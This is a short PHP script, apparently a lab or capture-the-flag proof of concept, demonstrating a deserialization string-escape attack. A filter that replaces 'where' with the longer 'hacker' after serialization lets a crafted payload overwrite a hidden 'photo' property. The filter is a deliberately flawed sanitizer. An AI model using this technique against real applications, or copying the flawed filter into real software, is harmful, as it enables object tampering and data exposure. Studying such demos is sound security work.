<?php

function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

class profile{
    public $nickname;
    public $photo = "123";
}

$pro = new profile();
///var_dump(serialize($pro));
//$pro->nickname = array("");
//var_dump(serialize($pro));

$payload = <<<EOF
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:5:"66666";}"
EOF;

$pro->nickname = array($payload);
$spro = serialize($pro);
var_dump($spro);
$spro = (filter($spro));
var_dump($spro);

var_dump(unserialize($spro));

?>
